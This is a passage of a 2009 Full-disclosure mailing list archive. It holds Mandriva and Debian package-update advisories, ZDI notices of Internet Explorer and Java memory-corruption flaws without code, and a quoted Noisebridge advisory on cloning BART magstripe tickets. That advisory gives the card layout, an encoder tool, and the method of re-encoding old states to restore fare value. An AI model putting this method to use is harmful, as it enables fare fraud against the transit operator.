ddc2cafb1a02ee501e5127a8731ea942 corporate/3.0/i586/apache2-mod_cache-2.0.48-6.22.C30mdk.i586.rpm f3bbd229b347489f40b81419214c42bd corporate/3.0/i586/apache2-mod_dav-2.0.48-6.22.C30mdk.i586.rpm cd19b116ef93c07f78efbe4393d2e3be corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.22.C30mdk.i586.rpm 5a2da72b9255a8c35f0ed877899f90eb corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.22.C30mdk.i586.rpm e940b8e3b2da880bca84ebc9f528b2e6 corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.22.C30mdk.i586.rpm 5d713bee1985cc49c585b4289ee76f1e corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.22.C30mdk.i586.rpm f293fbf344f6fc55e92170518a710149 corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.22.C30mdk.i586.rpm f4c48499cb6968a12a5250e3464a2b30 corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.22.C30mdk.i586.rpm 997ea437e49903a014de32e61573de7a corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.22.C30mdk.i586.rpm fe5f16a62fc94177286445e9830cb6a6 corporate/3.0/i586/apache2-modules-2.0.48-6.22.C30mdk.i586.rpm 4eb89be3edc9f7dd0511e22d64baefe2 corporate/3.0/i586/apache2-source-2.0.48-6.22.C30mdk.i586.rpm 64be98dcd021367f603e972cc40d6710 corporate/3.0/i586/libapr0-2.0.48-6.22.C30mdk.i586.rpm 5c5a7cb9305c8b0d469fc424931ae215 corporate/3.0/SRPMS/apache2-2.0.48-6.22.C30mdk.src.rpm Corporate 3.0/X86_64: c84b780216da90735018f37b8d606ad9 corporate/3.0/x86_64/apache2-2.0.48-6.22.C30mdk.x86_64.rpm 079ef7c187ea63bdfdb7b2f8e0c7ed85 corporate/3.0/x86_64/apache2-common-2.0.48-6.22.C30mdk.x86_64.rpm 78d8764d894dcf4821e3014b3bf0a1c2 corporate/3.0/x86_64/apache2-devel-2.0.48-6.22.C30mdk.x86_64.rpm e938351292eaf95bad5937066e071f6e corporate/3.0/x86_64/apache2-manual-2.0.48-6.22.C30mdk.x86_64.rpm b7b0c47891c1da19b9bfedd5eaeb5a12 corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.22.C30mdk.x86_64.rpm 14603191e70ea26450ad9f5254f1eff8 corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.22.C30mdk.x86_64.rpm f49c1f32bfa9b325836e28f7078d3897 corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.22.C30mdk.x86_64.rpm 0d8058c7d57105b18e97579817872d95 corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.22.C30mdk.x86_64.rpm 09b7bdc4907e672ee9b83a9f0ed2fb13 corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.22.C30mdk.x86_64.rpm 90a9565c923530b22f4141d2a186972b corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.22.C30mdk.x86_64.rpm 0f244810519460074938138d87a11997 corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.22.C30mdk.x86_64.rpm 0836106477de3d26f4c31a595c996cdc corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.22.C30mdk.x86_64.rpm 353d05dfc30072a39f3597c39454f331 corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.22.C30mdk.x86_64.rpm 1234e8bf94a4ddf65cf225aaf4367937 corporate/3.0/x86_64/apache2-modules-2.0.48-6.22.C30mdk.x86_64.rpm fbb25973021e327262cc152fd46996cc corporate/3.0/x86_64/apache2-source-2.0.48-6.22.C30mdk.x86_64.rpm 0520ca7c45963a2e2e26d8e3b5f63c41 corporate/3.0/x86_64/lib64apr0-2.0.48-6.22.C30mdk.x86_64.rpm 5c5a7cb9305c8b0d469fc424931ae215 corporate/3.0/SRPMS/apache2-2.0.48-6.22.C30mdk.src.rpm Corporate 4.0: 59bb8b01944e22319fcd4a0202bdffd9 corporate/4.0/i586/apr-util-dbd-mysql-1.2.7-6.2.20060mlcs4.i586.rpm 75fc1a2cbde6e0426f3f59cfd099b3b1 corporate/4.0/i586/apr-util-dbd-pgsql-1.2.7-6.2.20060mlcs4.i586.rpm 73cbae192430eca396ba79f548437cc1 corporate/4.0/i586/apr-util-dbd-sqlite3-1.2.7-6.2.20060mlcs4.i586.rpm 09726634b12dc2afc37d292853cfb28c corporate/4.0/i586/libapr1-1.2.7-1.1.20060mlcs4.i586.rpm cbfbe3652be9a6986f5f672034b84dc0 corporate/4.0/i586/libapr1-devel-1.2.7-1.1.20060mlcs4.i586.rpm 0733be6b968d4cbcce3494afe962ea12 corporate/4.0/i586/libapr-util1-1.2.7-6.2.20060mlcs4.i586.rpm 725117e7948c43a6fb72f51966d6dd79 corporate/4.0/i586/libapr-util1-devel-1.2.7-6.2.20060mlcs4.i586.rpm 4003af7f60b2b13d6f77a05ebe9dfb22 corporate/4.0/SRPMS/apr-1.2.7-1.1.20060mlcs4.src.rpm e74d2bc186c01528afbbf64f7491f221 corporate/4.0/SRPMS/apr-util-1.2.7-6.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 09e54e8fb5df6737dc1b00440d31d5c7 corporate/4.0/x86_64/apr-util-dbd-mysql-1.2.7-6.2.20060mlcs4.x86_64.rpm 766214b9f0df47776db7bea60f97298f corporate/4.0/x86_64/apr-util-dbd-pgsql-1.2.7-6.2.20060mlcs4.x86_64.rpm 22cb8925b104be9d571cf592a29064c3 corporate/4.0/x86_64/apr-util-dbd-sqlite3-1.2.7-6.2.20060mlcs4.x86_64.rpm 0fb8d44ea77b337e4026e72ed4000bf8 corporate/4.0/x86_64/lib64apr1-1.2.7-1.1.20060mlcs4.x86_64.rpm ba0345c32bfe4376621334e36a62a1c0 corporate/4.0/x86_64/lib64apr1-devel-1.2.7-1.1.20060mlcs4.x86_64.rpm cbd9beef22028ade9ecf3d172c710ff1 corporate/4.0/x86_64/lib64apr-util1-1.2.7-6.2.20060mlcs4.x86_64.rpm 5247ff1b281c9fa95ad547996f3bbb17 corporate/4.0/x86_64/lib64apr-util1-devel-1.2.7-6.2.20060mlcs4.x86_64.rpm 4003af7f60b2b13d6f77a05ebe9dfb22 corporate/4.0/SRPMS/apr-1.2.7-1.1.20060mlcs4.src.rpm e74d2bc186c01528afbbf64f7491f221 corporate/4.0/SRPMS/apr-util-1.2.7-6.2.20060mlcs4.src.rpm Mandriva Enterprise Server 5: fe7bd17a4b8499027179f5f421fce92d mes5/i586/libapr1-1.3.3-2.1mdvmes5.i586.rpm ce82a19e9423f69bc380fc32e0e96a9d mes5/i586/libapr-devel-1.3.3-2.1mdvmes5.i586.rpm 01004428f12cd78529ac43a546976121 mes5/SRPMS/apr-1.3.3-2.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 744cad17495d753e07fed748ccab4c46 mes5/x86_64/apr-util-dbd-freetds-1.3.4-2.2mdvmes5.x86_64.rpm 4c70155fb19f486a19f048455e41e480 mes5/x86_64/apr-util-dbd-ldap-1.3.4-2.2mdvmes5.x86_64.rpm 278c7292a0432e0d6760639667ec6858 mes5/x86_64/apr-util-dbd-mysql-1.3.4-2.2mdvmes5.x86_64.rpm 0358fea0177405ccd625304c83715992 mes5/x86_64/apr-util-dbd-odbc-1.3.4-2.2mdvmes5.x86_64.rpm a549b591b27f810ba898e75030f61398 mes5/x86_64/apr-util-dbd-pgsql-1.3.4-2.2mdvmes5.x86_64.rpm fb02a789f8ec6081f01df92768cda441 mes5/x86_64/apr-util-dbd-sqlite3-1.3.4-2.2mdvmes5.x86_64.rpm 4dbc88f0779d110f589ee60d7708e1e0 mes5/x86_64/lib64apr1-1.3.3-2.1mdvmes5.x86_64.rpm d591c7684cfd0d6a9a5ae749a3120f58 mes5/x86_64/lib64apr-devel-1.3.3-2.1mdvmes5.x86_64.rpm 6b946eebc0ff697faad4364beae260f8 mes5/x86_64/lib64apr-util1-1.3.4-2.2mdvmes5.x86_64.rpm 5c1f8dd8c2fcb0eb68bd1e24a25d1e22 mes5/x86_64/lib64apr-util-devel-1.3.4-2.2mdvmes5.x86_64.rpm 01004428f12cd78529ac43a546976121 mes5/SRPMS/apr-1.3.3-2.1mdvmes5.src.rpm Multi Network Firewall 2.0: 39d0747e39f45148c8540e76a272f219 mnf/2.0/i586/apache2-2.0.48-6.22.C30mdk.i586.rpm 9c7677568ec7e3fab84ed224af029d6a mnf/2.0/i586/apache2-common-2.0.48-6.22.C30mdk.i586.rpm 9f60f68aa326aaaa02cb6e9346ac0b7b mnf/2.0/i586/apache2-devel-2.0.48-6.22.C30mdk.i586.rpm a9051117cf2a34ed7cf9066e31d1767f mnf/2.0/i586/apache2-manual-2.0.48-6.22.C30mdk.i586.rpm ddc2cafb1a02ee501e5127a8731ea942 mnf/2.0/i586/apache2-mod_cache-2.0.48-6.22.C30mdk.i586.rpm f3bbd229b347489f40b81419214c42bd mnf/2.0/i586/apache2-mod_dav-2.0.48-6.22.C30mdk.i586.rpm cd19b116ef93c07f78efbe4393d2e3be mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.22.C30mdk.i586.rpm 5a2da72b9255a8c35f0ed877899f90eb mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.22.C30mdk.i586.rpm e940b8e3b2da880bca84ebc9f528b2e6 mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.22.C30mdk.i586.rpm 5d713bee1985cc49c585b4289ee76f1e mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.22.C30mdk.i586.rpm f293fbf344f6fc55e92170518a710149 mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.22.C30mdk.i586.rpm f4c48499cb6968a12a5250e3464a2b30 mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.22.C30mdk.i586.rpm 997ea437e49903a014de32e61573de7a mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.22.C30mdk.i586.rpm fe5f16a62fc94177286445e9830cb6a6 mnf/2.0/i586/apache2-modules-2.0.48-6.22.C30mdk.i586.rpm 4eb89be3edc9f7dd0511e22d64baefe2 mnf/2.0/i586/apache2-source-2.0.48-6.22.C30mdk.i586.rpm 64be98dcd021367f603e972cc40d6710 mnf/2.0/i586/libapr0-2.0.48-6.22.C30mdk.i586.rpm 5c5a7cb9305c8b0d469fc424931ae215 mnf/2.0/SRPMS/apache2-2.0.48-6.22.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKesC1mqjQ0CJFipgRAvjJAJ9/hkPV+kb4tO2KHfjb2m+3nV+9+gCfQHvt uej6FdYjm8TitsZAK4BFOis= =IDO9 -----END PGP SIGNATURE----- From zdi-disclosures at tippingpoint.com Wed Aug 5 18:44:36 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Wed, 5 Aug 2009 12:44:36 -0500 Subject: [Full-disclosure] ZDI-09-047: Microsoft Internet Explorer getElementsByTagName Memory Corruption Vulnerability Message-ID: ZDI-09-047: Microsoft Internet Explorer getElementsByTagName Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-047 August 5, 2009 -- CVE ID: CVE-2009-1918 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8360. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists in the appending of elements to an invalid object. When appending malformed elements to a empty DIV element memory corruption can occur. A properly constructed web page can result in remote code execution under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx -- Disclosure Timeline: 2009-04-28 - Vulnerability reported to vendor 2009-08-05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * wushi & ling of team509 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Wed Aug 5 18:45:11 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Wed, 5 Aug 2009 12:45:11 -0500 Subject: [Full-disclosure] ZDI-09-048: Microsoft Internet Explorer CSS Behavior Memory Corruption Vulnerability Message-ID: ZDI-09-048: Microsoft Internet Explorer CSS Behavior Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-048 August 5, 2009 -- CVE ID: CVE-2009-1919 -- Affected Vendors: Microsoft -- Affected Products: Microsoft Internet Explorer -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8359, 8361. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists when accessing embedded style sheets within an HTML file. When modifying the properties of rules defined in the style the behavior element is improperly processed resulting in a memory corruption which can be further leveraged to execute arbitrary code under the context of the current user. -- Vendor Response: Microsoft has issued an update to correct this vulnerability. More details can be found at: http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx -- Disclosure Timeline: 2009-04-28 - Vulnerability reported to vendor 2009-08-05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Peter Vreugdenhil -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Wed Aug 5 18:45:51 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Wed, 5 Aug 2009 12:45:51 -0500 Subject: [Full-disclosure] ZDI-09-049: Sun Java Pack200 Decoding Inner Class Count Integer Overflow Vulnerability Message-ID: ZDI-09-049: Sun Java Pack200 Decoding Inner Class Count Integer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-049 August 5, 2009 -- Affected Vendors: Sun Microsystems -- Affected Products: Sun Microsystems Java Runtime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Sun Java Runtime. User interaction is required in that a target must visit a malicious web page or open a malicious JNLP file. The specific flaw exists within the code responsible for handling Pack200 compressed JAR files. During decompression, several fields within a Pack200 header are trusted and used to calculate sizes for heap buffer allocations. By providing malicious values an attacker can create undersized heap buffers and subsequently overflow them. This can be leveraged to execute arbitrary code under the context of the user accessing the file or web page. -- Vendor Response: Sun Microsystems has issued an update to correct this vulnerability. More details can be found at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-263488-1 -- Disclosure Timeline: 2009-04-15 - Vulnerability reported to vendor 2009-08-05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From zdi-disclosures at tippingpoint.com Wed Aug 5 18:46:24 2009 From: zdi-disclosures at tippingpoint.com (ZDI Disclosures) Date: Wed, 5 Aug 2009 12:46:24 -0500 Subject: [Full-disclosure] ZDI-09-050: Sun Java Web Start JPEG Header Parsing Integer Overflow Vulnerability Message-ID: ZDI-09-050: Sun Java Web Start JPEG Header Parsing Integer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-050 August 5, 2009 -- Affected Vendors: Sun Microsystems -- Affected Products: Sun Microsystems Java Runtime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sun Java Web Start. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists within the code that handles loading a custom JPEG splash screen for a WebStart application. While handling certain parts of the splash screen, javaws.exe makes an improper calculation which is later used for an allocation. Later during decompression, Java Web Start will write data into this mis-allocated buffer resulting in a heap-based buffer overflow and eventual code execution under the context of the current user. -- Vendor Response: Sun Microsystems has issued an update to correct this vulnerability. More details can be found at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-263428-1 -- Disclosure Timeline: 2009-03-26 - Vulnerability reported to vendor 2009-08-05 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ From michal at sharescope.co.uk Thu Aug 6 09:14:28 2009 From: michal at sharescope.co.uk (Michal) Date: Thu, 6 Aug 2009 09:14:28 +0100 Subject: [Full-disclosure] BART Card Advisory In-Reply-To: <20090805162411.7419EB805A@smtp.hushmail.com> References: <20090805162411.7419EB805A@smtp.hushmail.com> Message-ID: <7C9F6D0C66A946DDAABA6423548BACF0@ionicoffice.ionic.co.uk> Is this...a shit version of the London Oyster Card? -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of noisebridge at hushmail.com Sent: 05 August 2009 17:24 To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] BART Card Advisory www.noisebridge.net -= Security Advisory =- Advisory: BART Tickets vulnerable to simple cloning Release Date: 2008/07/14 Author: Jacob Appelbaum Application: Bay Area Rapid Transit System (BART) Severity: All BART blue high-value tickets magstripe encoded tickets are vulnerable to cloning. Risk: Medium/High Vendor Status: Vendor has not been contacted "If you only read the books that everyone else is reading, you can only think what everyone else is thinking." -- Haruki Murakami Overview: Quote from www.bart.gov/tickets/ BART tickets are like debit cards with stored value. All BART stations have automatic ticket vending machines that accept nickels, dimes, quarters and $1 coins, as well as $1 $5, $10 and $20 bills. You can also use credit and debit cards in select machines. When you enter BART, insert your ticket into the fare gate and it will be returned to you. Use the same ticket when you exit. The correct fare will be automatically deducted and tickets with remaining value will be returned. If your ticket has too little value, a sign on the fare gate will read "Underpaid: Go to Addfare." A nearby Addfare vending machine will tell you how much additional fare you must add to your ticket to exit the BART system. It turns out that BART high value (blue) tickets and other magstripe BART tickets store value ON TICKET, as opposed to centrally via an authentication token. Critical information is stored directly on card using what is probably a simple block cipher and is vulnerable to a basic replay attack. In our analysis though, we have found that just like the SFMTA parking meter smartcard system, the signature goes UNVALIDATED. It seems theres a pattern here in the security systems of San Francisco public services! Hmmmm. This type of vulnerability does not extend to the new BART EZ Rider smart cards. (Applause) Track 2 Layout | SS | PAN | FS | Additional Data | ES | LRC | SS=Start Sentinel ";" PAN=Primary Acct. # (19 digits max) FS=Field Separator "=" Additional Data=Expiration Date, offset, encrypted PIN, etc. ES=End Sentinel "?" LRC=Longitudinal Redundancy Check In the ABA Track 2 system, the magic happens in the "Additional Data" area. Depending on bank (some remained completely unencrypted until mid 2000s!) the PIN numbers were actually stored on card only encrypted by a simple block cipher! Well it turns out the BART ticketing system, although not similar in format, does use the same general encoding format, 75bpi BCD which means you can take your standard off-the-shelf MSR-206 magstripe encoder/decoder and go! Fortunately for you, we've even provided this handy utility! http://code.google.com/p/libmsr/ This project is an independent Free Software implementation of the protocol for the MSR 206 magnetic stripe reader/writer. It is intended to be both a library for use in other programs that wish to interface with the MSR 206 and as a collection of useful user space programs. So onto the data. Bart Card Layout: | SET | VERSION | ID | DATA | VALUE | CRC | . set(?) . card id .- plain text value / / / 084909 5346 00721486 8432187913029 00405 1610 084909 5346 00721486 2072730117332 00065 2287 \ \ \ - version(?) \ `- CRC(?) `- data Set: Seems to be related to the ID but changes infrequently and doesnt seem to increment linearly. Version: This number seems to change infrequently but from time to time even for the same type of card (blue/red/green) ID: Card ID, which seems to be issued semi-sequentially Data: Most likely the encrypted version of value Value: Dollar value ($000.00) CRC: Possibly the checksum Although, as you can see, a plain-text BCD card value is stored on the stripe it is not the only data used to determine the on-card value. By our simple analysis (i.e. trying to encode other dollar figures in plaintext) It's clear that the plain text value in conjunction with the data field is used to validate the on-card value. We assume that the 4-digit value after the plain text value is the CRC, because this also changes each time its used, it's kinda small and it just seems like one (great evidence, huh!). In truth black-box differntial analysis of the magstripe data is relatively uninformational, but it turns out if we follow these this simple rule, we can effectively clone and use BART cards without any real brains. Don't use two clones of the same card at the same time. Anyone whos tried using a Fast Pass twice will realize they will be let in twice, but not let out twice. You'll end up stuck. Other than than, just copy the card and once in a while, reset the data back to a higher value by re-encoding a previous state. Anyways, if anyone wants to come join us at Noisebridge to clone some BART cards for fun and profit just swing by 83C Wiese Street with your extra cards (you know, the ones with a nickle on them). Also, if you would like to donate to the Noisebridge cause (and now an official 501(c)(3) non-profit corporation) we might be able to throw in a BART pass at twice the donation value! Just kidding, but hey, they're definately tax deductable and for a good cause ;) Regards, Jacob Appelbaum _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From white at debian.org Thu Aug 6 09:28:57 2009 From: white at debian.org (Steffen Joeris) Date: Thu, 6 Aug 2009 18:28:57 +1000 (EST) Subject: [Full-disclosure] [SECURITY] [DSA 1851-1] New gst-plugins-bad0.10 packages fix arbitrary code execution Message-ID: <20090806082858.009F8A9800A@hannah.localdomain> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1851-1 security at debian.org http://www.debian.org/security/ Steffen Joeris August 06, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : gst-plugins-bad0.10 Vulnerability : integer overflow Problem type : local (remote) Debian-specific: no CVE Id : CVE-2009-1438 Debian Bugs : 527075 It was discovered that gst-plugins-bad0.10, the GStreamer plugins from the "bad" set, is prone to an integer overflow when processing a MED file with a crafted song comment or song name. For the stable distribution (lenny), this problem has been fixed in version 0.10.7-2+lenny2. For the oldstable distribution (etch), this problem has been fixed in version 0.10.3-3.1+etch3. For the testing distribution (squeeze) and the unstable distribution (sid), gst-plugins-bad0.10 links against libmodplug. We recommend that you upgrade your gst-plugins-bad0.10 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (oldstable) - ------------------ Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gst-plugins-bad0.10_0.10.3.orig.tar.gz Size/MD5 checksum: 1377759 6d09962ac9ae6218932578ccc623407f http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gst-plugins-bad0.10_0.10.3-3.1+etch3.diff.gz Size/MD5 checksum: 10336 5e68af9a67d4b74d0b952ba9a03f458b http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gst-plugins-bad0.10_0.10.3-3.1+etch3.dsc Size/MD5 checksum: 820 6789b3d031b8def3dd61b1f27eef238f alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_alpha.deb Size/MD5 checksum: 720624 173cfe37545979df17cc1ac5f0d87793 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_amd64.deb Size/MD5 checksum: 550246 cc610896227967b7fb5fda1d2d6e1d3d arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_arm.deb Size/MD5 checksum: 561456 4d77c24b42bef05f8ac326bd3e7fd6e8 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_hppa.deb Size/MD5 checksum: 682050 0d51f9a9102f78190870df138d717207 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_i386.deb Size/MD5 checksum: 552622 e26d89435d4663762f10672078d2382d ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_ia64.deb Size/MD5 checksum: 832350 4a954aa4a54c18f9323a110d1fff816c mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_mips.deb Size/MD5 checksum: 605384 de9e5832fcc88c50ed87e09a7e8075a2 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_mipsel.deb Size/MD5 checksum: 600302 e1dfce03325040d91af0d749820a6325 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_powerpc.deb Size/MD5 checksum: 609498 708a10fa3924abc1cdd44689dbb54046 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_s390.deb Size/MD5 checksum: 580896 d597f796dd108c0a4d5fe6649d5d9d36 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad_0.10.3-3.1+etch3_sparc.deb Size/MD5 checksum: 567240 5ab2f0d96d8249bada46164456067ee5 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gst-plugins-bad0.10_0.10.7-2+lenny2.dsc Size/MD5 checksum: 2517 dc20c3967d56c963b5ca1b37ad946b9e http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gst-plugins-bad0.10_0.10.7-2+lenny2.diff.gz Size/MD5 checksum: 20320 9db23582425567d40978dfb9ddac7ae0 http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gst-plugins-bad0.10_0.10.7.orig.tar.gz Size/MD5 checksum: 2985922 280d714184d4728b726b43bf1ec4493a Architecture independent packages: http://security.debian.org/pool/updates/main/g/gst-plugins-bad0.10/gstreamer0.10-plugins-bad-doc_0.10.7-2+lenny2_all.deb Size/MD5 checksum: 117272 